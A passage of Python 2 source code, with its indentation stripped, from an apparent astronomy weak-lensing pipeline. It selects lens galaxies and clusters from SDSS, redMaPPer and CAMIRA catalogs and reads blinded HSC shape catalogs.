for i, fname in enumerate(files):
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3]))
else:
df = df.append(pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3])), ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock":
realization = lensargs['realization']
rotation = lensargs['rotation']
sample = lensargs['sample']
zmin = lensargs["zmin"]
zmax = lensargs["zmax"]
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/hod_gal/%s_%.2f_%.2f/newID/r%03d_rotmat%d_*" % (sample, zmin, zmax, realization, rotation))
for i, fname in enumerate(files):
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3]))
else:
df = df.append(pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3])), ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "dr12-lowz":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_LOWZ_North.fits.gz")
data = hdulist[1].data
ra_n = data["ra"]
dec_n = data["dec"]
zred_n = data["z"].astype('float64')
wt_n = data["weight_systot"].astype("float64")
idx = (zred_n>lensargs["zmin"]) & (zred_n<=lensargs["zmax"])
ra_n = ra_n[idx]
dec_n = dec_n[idx]
zred_n = zred_n[idx]
wt_n = wt_n[idx]
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_LOWZ_South.fits.gz")
data = hdulist[1].data
ra_s = data["ra"]
dec_s = data["dec"]
zred_s = data["z"].astype('float64')
wt_s = data["weight_systot"].astype("float64")
idx = (zred_s>lensargs["zmin"]) & (zred_s<=lensargs["zmax"])
ra_s = ra_s[idx]
dec_s = dec_s[idx]
zred_s = zred_s[idx]
wt_s = wt_s[idx]
ra = np.append(ra_n, ra_s)
dec = np.append(dec_n, dec_s)
zred = np.append(zred_n, zred_s)
wt = np.append(wt_n, wt_s)
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
if "pofzoutput" in lensargs:
n, bins = np.histogram(zred, weights=wt, bins=np.linspace(np.min(zred), np.max(zred), 20), normed=1)
np.savetxt(lensargs["pofzoutput"], np.transpose([bins[1:]/2+bins[:-1]/2, n]))
exit(11)
return ra, dec, zred, wt
if lensargs['type'] == "cfht-cmass-reproduce":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/cmass-dr11v1-A-Anderson.dat_wcollind_mstel_xdist.fits")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z"].astype('float64')
wt_star = data["weight_star"].astype("float64")
wt_noz = data["weight_noz"].astype("float64")
wt_cp = data["weight_cp"].astype("float64")
wt = wt_star*(wt_noz+wt_cp-1)
mstar = data["logmass"]
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (mstar>lensargs["mstarmin"]) & (mstar<=lensargs["mstarmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "dr12-cmass":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_CMASS_North.fits.gz")
data = hdulist[1].data
ra_n = data["ra"]
dec_n = data["dec"]
zred_n = data["z"].astype('float64')
wt_n = data["weight_systot"].astype("float64")
idx = (zred_n>lensargs["zmin"]) & (zred_n<=lensargs["zmax"])
ra_n = ra_n[idx]
dec_n = dec_n[idx]
zred_n = zred_n[idx]
wt_n = wt_n[idx]
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/DR12/galaxy_DR12v5_CMASS_South.fits.gz")
data = hdulist[1].data
ra_s = data["ra"]
dec_s = data["dec"]
zred_s = data["z"].astype('float64')
wt_s = data["weight_systot"].astype("float64")
idx = (zred_s>lensargs["zmin"]) & (zred_s<=lensargs["zmax"])
ra_s = ra_s[idx]
dec_s = dec_s[idx]
zred_s = zred_s[idx]
wt_s = wt_s[idx]
ra = np.append(ra_n, ra_s)
dec = np.append(dec_n, dec_s)
zred = np.append(zred_n, zred_s)
wt = np.append(wt_n, wt_s)
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
if "pofzoutput" in lensargs:
n, bins = np.histogram(zred, weights=wt, bins=np.linspace(np.min(zred), np.max(zred), 20), normed=1)
np.savetxt(lensargs["pofzoutput"], np.transpose([bins[1:]/2+bins[:-1]/2, n]))
exit(11)
return ra, dec, zred, wt
if lensargs['type'] == "voids":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Voids/Void_combined_catalog.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.zred.values
wt = ra/ra
sys.stdout.write("Selecting %d voids \n" % (ra.size))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "alexie-test":
ra, dec, zred, wt = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/alexie-test/bossdr12_GAMA15_zbin1.txt", unpack=1)
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper-smallR":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper-smallR/dr8_run_redmapper_v5.10-0.75_lgt5_prunedcatalog.fit")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z_lambda"].astype('float64')
lamda = data["lambda_chisq"]
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper-largeR":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper-largeR/dr8_run_redmapper_v5.10-1.25_lgt5_prunedcatalog.fit")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z_lambda"].astype('float64')
lamda = data["lambda_chisq"]
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v5.10_catalog.fits")
data = hdulist[1].data
ra = data["ra"]
dec = data["dec"]
zred = data["z_lambda"].astype('float64')
lamda = data["lambda"]
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "arindam_lenses":
fp=pandas.read_csv("arindam/arindam_lenses.csv",delimiter=",",usecols=[0,1,2],header=None,skiprows=1)
ra = fp[0].astype('float64')
dec = fp[1].astype('float64')
zred = fp[2].astype('float64')
wt = ra/ra
idx=fp[2] > 0
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
return ra, dec, zred, wt
if lensargs['type'] == "redmapper_satellite":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_members.fits")
hdulist2 = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_catalog.fits")
data = hdulist[1].data
data2 = hdulist2[1].data
#choose clusers where culster centre is defined with probablity more than 95%
tp_cen=data2["P_CEN"].astype("float64")
aa=np.array([i[0] for i in tp_cen])
tidx2=aa>0.95
data2=data2[tidx2]
cid_idx=data2["id"] #in cluster catalog
mid_idx=data["id"] #member catalog
tidx = np.where(np.in1d(mid_idx, cid_idx),True,False)
data=data[tidx]
zlamda=data2["z_lambda"]
cid=data2["id"]
ldict={}
for ii in range(cid.size):
ldict[cid[ii]]=zlamda[ii]
mid=data['id']
ra = data["ra"]
dec = data["dec"]
lamda = data2["lambda"]
wt = ra/ra
r = data["r"]
zred = ra*0.0
for jj in range(mid.size):
zred[jj]=ldict[mid[jj]].astype('float64')
rr=r*(1.+zred) #to convert from physical to comoving distances
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (rr>lensargs["rmin"]) & (rr<=lensargs["rmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
#lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper_satellite_stellar_counterpart":
#hdulist = pyfits.open("pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_members.fits")
hdulist=pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_hsc_sdss_stellar_counterpart.fits")
#hdulist2 = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_catalog.fits")
data = hdulist[1].data
#data2 = hdulist2[1].data
#zlamda=data2["z_lambda"]
#cid=data2["id"]
#ldict={}
#for ii in range(cid.size):
# ldict[cid[ii]]=zlamda[ii]
#mid=data['id']
ra = data["sdssdata_ra"].astype("float64")
dec = data["sdssdata_dec"].astype("float64")
#lamda = data2["lambda"].astype("float64")
wt = ra/ra
r = data["redmapper_rsat"]
zred = data["redmapper_zstellar"].astype("float64")
#for jj in range(mid.size):
# zred[jj]=ldict[mid[jj]].astype('float64')
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (r>lensargs["rmin"]) & (r<=lensargs["rmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
#lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper_random":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_dr8_public_v6.3_randoms.fits")
data = hdulist[1].data
ra = data["ra"].astype('float64')
dec = data["dec"].astype('float64')
zred = data["z"].astype('float64')
lamda = data["lambda"].astype('float64')
wt = data["weight"].astype('float64')
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "redmapper-random":
ra, dec, zred, lamda, wt = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/redmapper/redmapper_public_v5.10_randoms_%05d.dat" % (lensargs["rannum"]), unpack=1)
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lamda>lensargs["lammin"]) & (lamda<=lensargs["lammax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d randoms \n" % (np.sum(idx)))
return ra[idx], dec[idx], zred[idx], wt[idx]
if lensargs['type'] == "redmapper_satellite_in_hsc_field":
hdulist = pyfits.open("hsc_redmapper_overlap/redmapper_members_hsc_overlap_.fits")
data = hdulist[1].data
ra = data['redmapper_Ra'].astype('float64')
dec = data['redmapper_Dec'].astype('float64')
wt = ra/ra
r = data['dist_from_cluster_center'].astype('float64')
zred = data['redmapper_redshift'].astype('float64')
rr=r*(1.+zred) #to convert from physical to comoving distances
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (rr>lensargs["rmin"]) & (rr<=lensargs["rmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
#lamda = lamda[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
#return ra[idx], dec[idx], zred[idx], wt[idx]
return ra, dec, zred, wt
if lensargs['type'] == "sdss-vagc-lbg":
ra, dec, zred, mstel, mag = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/LBG/Isolated_v0.dat", unpack=1)
mstel = np.log10(mstel)
wt = ra/ra
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (mstel>lensargs["xmstelmin"]) & (mstel<=lensargs["xmstelmax"])
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
return ra[idx], dec[idx], zred[idx], wt[idx]
if lensargs['type'] == "lowz_rcsrestrict":
ra, dec, zred, lam, wt = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/rcsrestrict_dr12_v5_lowz_All_catalog.dat", unpack=1)
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
return ra[idx], dec[idx], zred[idx], wt[idx]
if lensargs['type'] == "camira":
ra, dec, zred, lam = np.loadtxt("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/camira/%s/%s/camira_catalog.dat" % (lensargs['hsc-release'], lensargs['version']), unpack=1, usecols=(0, 1, 2, 3))
wt = lam/lam
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"]) & (lam>lensargs["lammin"]) & (lam<=lensargs["lammax"])
sys.stdout.write("Selecting %d lenses \n" % (np.sum(idx)))
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
if "pofzoutput" in lensargs:
n, bins = np.histogram(zred, weights=wt, bins=np.linspace(np.min(zred), np.max(zred), 20), normed=1)
np.savetxt(lensargs["pofzoutput"], np.transpose([bins[1:]/2+bins[:-1]/2, n]))
exit(11)
return ra, dec, zred, wt
def source_select(sourceargs, chunksize):
"""
source_select(dictionary lensargs)
Selects source sample
:Parameters:
- sourceargs : Dictionary read from the config file which contains various
cuts on the source sample
- chunksize : The chunksize of sources to be read (only applicable for some ascii readers)
:Returns: return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
- datagal : array consisting of ra, dec, e1, e2, weight, erms, m, c1, c2, a1, a2
- sourceargs : Dictionary read from the config file which contains various
cuts on the source sample
- Ngal : Number of galaxies
- status : status of the read
- pofz : Record arrays read from the P(z) file for `Ngal` galaxies
- datagalflag: Flag array to indicate whether to use the galaxy or not
- pofzflag: Flag array to indicate whether to use the photoz of the galaxy or not
"""
if sourceargs['type'] == "hsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and not sourceargs["fullpofz"]:
# This variable iterates over the different fields in the catalog
itern = sourceargs['iter']
if itern == 0:
if not sourceargs["blinded"]:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat.calibrated", delim_whitespace=1)
else:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat", delim_whitespace=1)
if "usefield" in sourceargs:
restidx = sourceargs["df"].field.values==sourceargs["usefield"]
sourceargs["df"] = sourceargs["df"][restidx]
print "Using only field", sourceargs["usefield"]
datagal = 0
Ngal = 0
pofz = 0
status = not (itern<(sourceargs['df'].field.values.size))
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
field = sourceargs["df"].field.values[itern]
tract = sourceargs["df"].tract.values[itern]
begin = sourceargs["df"].begin.values[itern]
end = sourceargs["df"].end.values[itern]
# Initialize list of tracts within a given field
if begin == 0:
# Define the shape catalog file from Rachel to read from for this field
if sourceargs["blinded"]:
# Decrypt the Delta m value, if sourceargs["dm"] not set already
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_blinded_m_%s_%d.fits" % (field, sourceargs["username"], sourceargs["blindnumber"])
fname_nom = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_no_m.fits" % (field)
if "dm" not in sourceargs:
try:
hdulist = pyfits.open(fname, memmap=True)
msg = hdulist[0].header["DM1"]
sourceargs['dm'] = float(decrypt_string(FITS_to_PGP(msg)))
except:
print "GPG decryption failed, check your gpg-agent"
exit(12)
# The commented line is memory intensive
#sourceargs["fits"] = fitsio.FITS("%s[1][col *, ishape_hsm_regauss_derived_shear_bias_m = ishape_hsm_regauss_derived_shear_bias_m - %f ]" % (fname, sourceargs['dm']))[1]
# Instead read the file as it is and then subtract off later
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits"] = fitsio.FITS("%s" % (fname_nom))[1]
else:
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Calibrated_S16A_v2.0/%s_calibrated.fits" % (field)
sourceargs["fits"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["dm"] = 0.0
# Read in the photoz file for the current field, tract
try:
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%d_pz.fits" % (field, tract))
data = hdulist[1].data
pofz = data["%s_photoz%s" % (sourceargs['pofz_type'], sourceargs['photoz_estimate']) ]
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<sourceargs['photoz_risk_best_cut'])
except:
pofz = 0
pofzflag = np.zeros(end-begin, dtype=bool)
# Read in the shape values for the current field, tract, the row filtering specification indexes rows from 1 - Nrecords
wheremask = sourceargs['fits'].where("#row>%d && #row<=%d" % (begin, end))
#datagal = sourceargs['fits'][1]["ira", "idec", "ishape_hsm_regauss_e1", "ishape_hsm_regauss_e2", "ishape_hsm_regauss_derived_shear_bias_c1", "ishape_hsm_regauss_derived_shear_bias_c2", "ishape_hsm_regauss_derived_shear_bias_m", "ishape_hsm_regauss_derived_shape_weight", "ishape_hsm_regauss_derived_rms_e"][wheremask]
#datagal = sourceargs['fits']["ira", "idec", "ishape_hsm_regauss_e1", "ishape_hsm_regauss_e2", "ishape_hsm_regauss_derived_shape_weight", "ishape_hsm_regauss_derived_rms_e", "ishape_hsm_regauss_derived_shear_bias_m", "ishape_hsm_regauss_derived_shear_bias_c1", "ishape_hsm_regauss_derived_shear_bias_c2"][wheremask]
ira = sourceargs['fits']["ira"][wheremask]
idec = sourceargs['fits']["idec"][wheremask]
ishape_hsm_regauss_e1 = sourceargs['fits']["ishape_hsm_regauss_e1"][wheremask]
ishape_hsm_regauss_e2 = sourceargs['fits']["ishape_hsm_regauss_e2"][wheremask]
ishape_hsm_regauss_derived_shape_weight = sourceargs['fits']["ishape_hsm_regauss_derived_shape_weight"][wheremask]
ishape_hsm_regauss_derived_rms_e = sourceargs['fits']["ishape_hsm_regauss_derived_rms_e"][wheremask]
ishape_hsm_regauss_derived_shear_bias_m = sourceargs['fits_mblind']["ishape_hsm_regauss_derived_shear_bias_m"][wheremask] - sourceargs["dm"]
ishape_hsm_regauss_derived_shear_bias_c1 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c1"][wheremask]
ishape_hsm_regauss_derived_shear_bias_c2 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c2"][wheremask]
ishape_hsm_regauss_resolution = sourceargs['fits']["ishape_hsm_regauss_resolution"][wheremask]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_shape_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_shear_bias_m, ishape_hsm_regauss_derived_shear_bias_c1, ishape_hsm_regauss_derived_shear_bias_c2, ishape_hsm_regauss_resolution]).T
datagalflag = sourceargs['fits']["weak_lensing_flag"][wheremask]
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofzflag.size
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
if sourceargs['type'] == "hsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
# This variable iterates over the different fields in the catalog
itern = sourceargs['iter']
if itern == 0:
if not sourceargs["blinded"]:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat.calibrated", delim_whitespace=1)
else:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat", delim_whitespace=1)
if "usefield" in sourceargs:
restidx = sourceargs["df"].field.values==sourceargs["usefield"]
sourceargs["df"] = sourceargs["df"][restidx]
print "Using only field", sourceargs["usefield"]
datagal = 0
Ngal = 0
pofz = 0
status = not (itern<(sourceargs['df'].field.values.size))
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
field = sourceargs["df"].field.values[itern]
tract = sourceargs["df"].tract.values[itern]
begin = sourceargs["df"].begin.values[itern]
end = sourceargs["df"].end.values[itern]
# Initialize list of tracts within a given field
if begin == 0:
# Define the shape catalog file from Rachel to read from for this field
if sourceargs["blinded"]:
# Decrypt the Delta m value, if sourceargs["dm"] not set already
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_blinded_m_%s_%d.fits" % (field, sourceargs["username"], sourceargs["blindnumber"])
fname_nom = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_no_m.fits" % (field)
if "dm" not in sourceargs:
try:
hdulist = pyfits.open(fname, memmap=True)
msg = hdulist[0].header["DM1"]
sourceargs['dm'] = float(decrypt_string(FITS_to_PGP(msg)))
except:
print "GPG decryption failed, check your gpg-agent"
exit(12)
# The commented line is memory intensive
#sourceargs["fits"] = fitsio.FITS("%s[1][col *, ishape_hsm_regauss_derived_shear_bias_m = ishape_hsm_regauss_derived_shear_bias_m - %f ]" % (fname, sourceargs['dm']))[1]
# Instead read the file as it is and then subtract off later
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits"] = fitsio.FITS("%s" % (fname_nom))[1]
else:
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Calibrated_S16A_v2.0/%s_calibrated.fits" % (field)
sourceargs["fits"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["dm"] = 0.0
# Read in the photoz file for the current field, tract
try:
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%d_pz.fits" % (field, tract))
data = hdulist[1].data
pofz = data["%s_photoz_best" % (sourceargs['pofz_type']) ]
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<sourceargs['photoz_risk_best_cut'])
except:
pofz = 0
pofzflag = np.zeros(end-begin, dtype=bool)
# Read in the shape values for the current field, tract
wheremask = sourceargs['fits'].where("#row>%d && #row<=%d" % (begin, end))
#datagal = sourceargs['fits']["ira", "idec", "ishape_hsm_regauss_e1", "ishape_hsm_regauss_e2", "ishape_hsm_regauss_derived_shear_bias_c1", "ishape_hsm_regauss_derived_shear_bias_c2", "ishape_hsm_regauss_derived_shape_weight", "ishape_hsm_regauss_derived_rms_e"][wheremask]
#datagalflag = sourceargs['fits'][1]["weak_lensing_flag"][wheremask]
ira = sourceargs['fits']["ira"][wheremask]
idec = sourceargs['fits']["idec"][wheremask]
ishape_hsm_regauss_e1 = sourceargs['fits']["ishape_hsm_regauss_e1"][wheremask]
ishape_hsm_regauss_e2 = sourceargs['fits']["ishape_hsm_regauss_e2"][wheremask]
ishape_hsm_regauss_derived_shape_weight = sourceargs['fits']["ishape_hsm_regauss_derived_shape_weight"][wheremask]
ishape_hsm_regauss_derived_rms_e = sourceargs['fits']["ishape_hsm_regauss_derived_rms_e"][wheremask]
ishape_hsm_regauss_derived_shear_bias_m = sourceargs['fits_mblind']["ishape_hsm_regauss_derived_shear_bias_m"][wheremask] - sourceargs["dm"]
ishape_hsm_regauss_derived_shear_bias_c1 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c1"][wheremask]
ishape_hsm_regauss_derived_shear_bias_c2 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c2"][wheremask]
ishape_hsm_regauss_resolution = sourceargs['fits']["ishape_hsm_regauss_resolution"][wheremask]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_shape_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_shear_bias_m, ishape_hsm_regauss_derived_shear_bias_c1, ishape_hsm_regauss_derived_shear_bias_c2, ishape_hsm_regauss_resolution]).T
datagalflag = sourceargs['fits']["weak_lensing_flag"][wheremask]
try:
sourceargs['fitspofz'] = fitsio.FITS("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%d_pz_pdf_%s.fits" % (field, tract, sourceargs['pofz_type']))[1]
pofz = sourceargs['fitspofz']['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
except:
pofz = 0
pofzflag = np.zeros(end-begin, dtype=bool)
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofzflag.size
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
# S16A_v2.0 kept here for notes when required. This was before Rachel computed the calibration factors
if sourceargs['type'] == "hsc-wide-s16a_v2.0_old" and sourceargs['filetype'] == "fits" and not sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_pz.fits")
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz")[0] + ".fits")
data = hdulist[1].data
ira = data["ira"]
idec = data["idec"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_derived_bias_c1 = data["ishape_hsm_regauss_derived_bias_c1"]
ishape_hsm_regauss_derived_bias_c2 = data["ishape_hsm_regauss_derived_bias_c2"]
ishape_hsm_regauss_derived_bias_m = data["ishape_hsm_regauss_derived_bias_m"]
ishape_hsm_regauss_derived_weight = data["ishape_hsm_regauss_derived_weight"]
ishape_hsm_regauss_derived_rms_e = data["ishape_hsm_regauss_derived_rms_e"]
zeroarr = ishape_hsm_regauss_derived_bias_c1 * 0.0
datagalflag = data["weak_lensing_flag"]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_bias_m, ishape_hsm_regauss_derived_bias_c1, ishape_hsm_regauss_derived_bias_c2]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern])
data = hdulist[1].data
pofz = data["%s_photoz_best" % (sourceargs['pofz_type']) ]
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<sourceargs['photoz_risk_best_cut'])
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofz.size
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
'''
